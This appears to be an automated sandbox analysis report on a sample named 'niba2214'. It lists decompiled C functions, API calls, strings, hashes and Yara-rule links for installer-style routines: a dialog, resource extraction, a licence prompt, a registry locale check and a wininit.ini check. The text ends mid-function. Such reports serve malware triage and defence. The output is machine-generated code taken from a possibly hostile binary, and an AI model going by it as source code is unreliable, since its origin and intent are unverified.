Opcode Fuzzy Hash: f8d72a6d432ba35b3a7279e74d4407a5a1f3de01a91c6f6661c34dce9d4fa16a
Instruction Fuzzy Hash: 18116371E10309AFEB609FA5EC8EBBEBB78EF44711F100569FA15E3240DA709D108B91

Uniqueness

Uniqueness Score: -1.00%

Function 01253450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01253450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E012543D0(_t24, _t12);
					SetWindowTextA(_t24, "siga30");
					SetDlgItemTextA(_t24, 0x838,  *0x1259404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x12591dc = 1;
					goto L8;
				}
				return 0;
			}

0x01253459
0x0125345c
0x012534d8
0x012534de
0x00000000
0x012534e0
0x0125345e
0x01253463
0x0125349a
0x012534a0
0x012534a7
0x012534b2
0x012534c4
0x012534cb
0x00000000
0x012534cb
0x01253468
0x0125346e
0x01253474
0x00000000
0x00000000
0x0125347c
0x0125348c
0x01253490
0x00000000
0x01253496
0x01253484
0x00000000
0x00000000
0x01253486
0x00000000
0x01253486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 01253490
GetDesktopWindow.USER32 ref: 0125349A
SetWindowTextA.USER32(?,siga30), ref: 012534B2
SetDlgItemTextA.USER32(?,00000838), ref: 012534C4
SetForegroundWindow.USER32(?), ref: 012534CB
EndDialog.USER32(?,00000002), ref: 012534D8

Strings

siga30, xrefs: 012534AC

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: siga30
API String ID: 852535152-2499866817
Opcode ID: 43583300a7da701de5b650a1a4438bd5ef6409b56b178d24fe820a7336301900
Instruction ID: 61b0fb321c6889553cba65a43e920b89a7ade78fa836da68bea2948cdbd4846e
Opcode Fuzzy Hash: 43583300a7da701de5b650a1a4438bd5ef6409b56b178d24fe820a7336301900
Instruction Fuzzy Hash: 8901D435260225ABDBA69F69E8CE96E3F64FB057D0F00D514FF4687584CB708A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01252AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E01252AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x1258004; // 0x958f311c
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x1259a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E01251680(_t65, E012517C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E012565E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E01251680(_t65, E012517C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E01256CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x01252aac
0x01252ab7
0x01252abc
0x01252abe
0x01252ac3
0x01252ac6
0x01252ac9
0x01252ace
0x01252ae6
0x01252bdc
0x01252bdc
0x01252be0
0x00000000
0x00000000
0x01252af2
0x01252afc
0x01252b00
0x01252b05
0x01252b05
0x01252b0b
0x01252bca
0x01252bd1
0x01252b11
0x01252b18
0x01252b26
0x01252b99
0x01252bc8
0x00000000
0x00000000
0x01252b9b
0x01252bae
0x01252bb3
0x01252bb5
0x01252bb5
0x01252bb8
0x01252bb8
0x01252bba
0x01252bbb
0x00000000
0x01252bb8
0x01252b28
0x01252b2e
0x01252b33
0x01252b39
0x01252b3c
0x01252b3c
0x01252b3e
0x01252b3f
0x01252b55
0x01252b5d
0x01252b64
0x01252b64
0x01252b7a
0x01252b7f
0x01252b81
0x01252b81
0x01252b84
0x01252b84
0x01252b86
0x01252b87
0x01252bbf
0x01252bc1
0x01252bc1
0x01252b26
0x01252bda
0x01252bda
0x01252be6
0x01252be6
0x01252bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01252AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 01252AF2
CharNextA.USER32(?), ref: 01252B12
CharUpperA.USER32 ref: 01252B1E
CharPrevA.USER32(?,?), ref: 01252B55
CharNextA.USER32(?), ref: 01252BD4

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 17f1fb284cf92360c472a6c8ef490ac9382640f57d737f1c37183c853b485910
Instruction ID: 1cecd5364311ebc60efec902f2dd3dfd2e8186d7906983c9dc776123c168354c
Opcode Fuzzy Hash: 17f1fb284cf92360c472a6c8ef490ac9382640f57d737f1c37183c853b485910
Instruction Fuzzy Hash: CC414634514246DFDBA69F3898C8BFD7FA99F42210F04419ADCC283282EB744A82CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012543D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012543D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x1258004; // 0x958f311c
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E01256CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x012543d0
0x012543d8
0x012543df
0x012543e6
0x012543ec
0x012543f1
0x01254400
0x01254403
0x0125440b
0x01254420
0x01254429
0x01254437
0x01254444
0x01254447
0x0125444d
0x01254454
0x0125445b
0x01254460
0x01254461
0x01254467
0x0125446f
0x01254473
0x01254473
0x01254463
0x01254463
0x01254463
0x0125447a
0x01254481
0x01254484
0x0125448a
0x01254492
0x01254496
0x01254496
0x01254486
0x01254486
0x01254486
0x012544b8

APIs

GetWindowRect.USER32(?,?), ref: 012543F1
GetWindowRect.USER32(00000000,?), ref: 0125440B
GetDC.USER32(?), ref: 01254423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0125442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0125443A
ReleaseDC.USER32(?,00000000), ref: 01254447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 012544A2

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: dbbcc4048fed8976d6094dcd2efa177971f95fe681f72757410de81d016b82b9
Instruction ID: 76cfd137bbf17089db1c8d15e7f13b3e902d6efada8f2ffb0fb879046a5b7f0b
Opcode Fuzzy Hash: dbbcc4048fed8976d6094dcd2efa177971f95fe681f72757410de81d016b82b9
Instruction Fuzzy Hash: 53314232E10219AFCB14DFB8D98DDEEBFB5EB89310F154269F905B3244E6706D458B60

Uniqueness

Uniqueness Score: -1.00%

Function 01256298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01256298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x1258004; // 0x958f311c
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0125171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x1259124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x125a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0125171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E01256CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x01256298
0x012562a0
0x012562a7
0x012562ad
0x012562af
0x012562bb
0x012562c3
0x012562c4
0x0125633b
0x0125633b
0x01256345
0x0125634d
0x00000000
0x00000000
0x012562da
0x012562de
0x0125635f
0x01256369
0x012562e0
0x012562e0
0x012562e0
0x012562e3
0x012562e5
0x012562e5
0x012562e8
0x012562e8
0x012562ea
0x012562eb
0x012562ef
0x012562f1
0x012562f3
0x01256302
0x01256308
0x0125630d
0x01256314
0x01256314
0x01256316
0x01256319
0x01256355
0x01256357
0x0125631b
0x0125631b
0x01256331
0x01256334
0x01256339
0x00000000
0x01256339
0x01256319
0x0125636b
0x0125637d
0x0125637d
0x00000000

APIs

Part of subcall function 0125171E: _vsnprintf.MSVCRT ref: 01251750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,012551CA,00000004,00000024,01252F71,?,00000002,00000000), ref: 012562CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,012551CA,00000004,00000024,01252F71,?,00000002,00000000), ref: 012562D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,012551CA,00000004,00000024,01252F71,?,00000002,00000000), ref: 0125631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01256345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,012551CA,00000004,00000024,01252F71,?,00000002,00000000), ref: 01256357

Strings

UPDFILE%lu, xrefs: 012562B3, 01256329

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: d7421206a337ad36f873cf2162d337fe632a1c105d4fa0825a8b911939dfc342
Instruction ID: 09171e664cc7a176596c130af22578dd01cdc640118534f8dba9db8d78f9cdce
Opcode Fuzzy Hash: d7421206a337ad36f873cf2162d337fe632a1c105d4fa0825a8b911939dfc342
Instruction Fuzzy Hash: E421D875A1021AABDB549F65DCC99BF7B78EF44754B044219EE02A3201DB759D018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0125681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0125681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x1258004; // 0x958f311c
				_v8 = _t19 ^ _t44;
				_t41 =  *0x12581d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x12581d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x12581d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x1251140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E012566F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x12581d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E01256CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0125681f
0x0125682a
0x01256831
0x01256836
0x0125683c
0x0125683e
0x01256848
0x01256851
0x0125685d
0x01256864
0x01256876
0x0125693a
0x0125693a
0x0125687c
0x0125687e
0x01256885
0x00000000
0x012568d6
0x012568f4
0x01256900
0x01256902
0x0125690a
0x00000000
0x0125690c
0x0125690c
0x0125691c
0x00000000
0x0125691e
0x01256924
0x0125692b
0x01256932
0x00000000
0x00000000
0x00000000
0x0125692b
0x0125691c
0x0125690a
0x01256885
0x01256876
0x01256951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0125686E
GetSystemMetrics.USER32(0000004A), ref: 012568A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 012568CC
RegQueryValueExA.ADVAPI32(?,01251140,00000000,?,?,0000000C), ref: 012568F4
RegCloseKey.ADVAPI32(?), ref: 01256902

Part of subcall function 012566F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0125691A), ref: 01256741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 012568C2

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 5760b99a4ed34c0991303263a8c6d5bb9ca71b320b95f1a278fa45c15bf5746f
Instruction ID: 7320d70419c34e5ab2386ef5577db6ff9d6b947d9a9f28269e3713893b1c8c58
Opcode Fuzzy Hash: 5760b99a4ed34c0991303263a8c6d5bb9ca71b320b95f1a278fa45c15bf5746f
Instruction Fuzzy Hash: 8331C031B203199FDB718B15DC89BEAB778FB41324F4401A5EE09A3100DB7099858F52

Uniqueness

Uniqueness Score: -1.00%

Function 01253A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01253A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0125468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x1258d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0125468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x1258d4c, "<None>") == 0) {
							LocalFree( *0x1258d4c);
							L9:
							 *0x1259124 = 0;
							return 1;
						}
						_t9 = E01256517(_t19, 0x7d1, 0, E01253100, 0, 0);
						LocalFree( *0x1258d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x1259124 = 0x800704c7;
						L2:
						return 0;
					}
					E012544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x1258d4c);
					 *0x1259124 = 0x80070714;
					goto L2;
				}
				E012544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1259124 = E01256285();
				goto L2;
			}

0x01253a46
0x01253a57
0x01253a5d
0x01253a63
0x01253a6a
0x01253a91
0x01253a9a
0x01253ad8
0x01253b13
0x01253b19
0x01253b1b
0x00000000
0x01253b21
0x01253ae7
0x01253af4
0x01253afc
0x00000000
0x00000000
0x01253afe
0x01253a87
0x00000000
0x01253a87
0x01253aa8
0x01253ab3
0x01253ab9
0x00000000
0x01253ab9
0x01253a78
0x01253a82
0x00000000

APIs

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01252F64,?,00000002,00000000), ref: 01253A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01253AB3

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Part of subcall function 01256285: GetLastError.KERNEL32(01255BBC), ref: 01256285

lstrcmpA.KERNEL32(<None>,00000000), ref: 01253AD0
LocalFree.KERNEL32 ref: 01253B13

Part of subcall function 01256517: FindResourceA.KERNEL32(01250000,000007D6,00000005), ref: 0125652A
Part of subcall function 01256517: LoadResource.KERNEL32(01250000,00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01256538
Part of subcall function 01256517: DialogBoxIndirectParamA.USER32(01250000,00000000,00000547,012519E0,00000000), ref: 01256557
Part of subcall function 01256517: FreeResource.KERNEL32(00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01256560

LocalFree.KERNEL32(00000000,01253100,00000000,00000000), ref: 01253AF4

Strings

LICENSE, xrefs: 01253A46
<None>, xrefs: 01253AC5

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 0bdb40a19b21f79c9200d3422601b59e2c7817caf30e2120fbe9499ede3eec05
Instruction ID: b956d5c1ed19eb63dfedf21b81449554c9ed8147d4b54fc6e9134a25f2199011
Opcode Fuzzy Hash: 0bdb40a19b21f79c9200d3422601b59e2c7817caf30e2120fbe9499ede3eec05
Instruction Fuzzy Hash: 8A11BB70621311ABDBB5AB37BCCDF2779F9EBD4790B00512DBE41D6154E6B584008B60

Uniqueness

Uniqueness Score: -1.00%

Function 012524E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E012524E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x1258004; // 0x958f311c
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0125658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E01256CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x012524e0
0x012524eb
0x012524f2
0x012524f7
0x01252504
0x0125250e
0x0125251d
0x0125252c
0x01252541
0x01252546
0x01252553
0x01252555
0x01252555
0x01252546
0x0125256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01252506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0125252C
_lopen.KERNEL32 ref: 0125253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0125254C
_lclose.KERNEL32(00000000), ref: 01252555

Strings

wininit.ini, xrefs: 01252510

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 65fbb44f4c0c7911d21f3199dc00183e9cb1995dc3a6eefa3a4ba3d906b120d2
Instruction ID: de7ab5dc7adf6c5dff603d2f4a84de73ede27a8070f33284cd189ba25eb0ece0
Opcode Fuzzy Hash: 65fbb44f4c0c7911d21f3199dc00183e9cb1995dc3a6eefa3a4ba3d906b120d2
Instruction Fuzzy Hash: C201B532610228ABD7709A69AC8DEEF7B7CEB55760F400255FA49D3184DE748E41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012536EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012536EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x1258004; // 0x958f311c
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
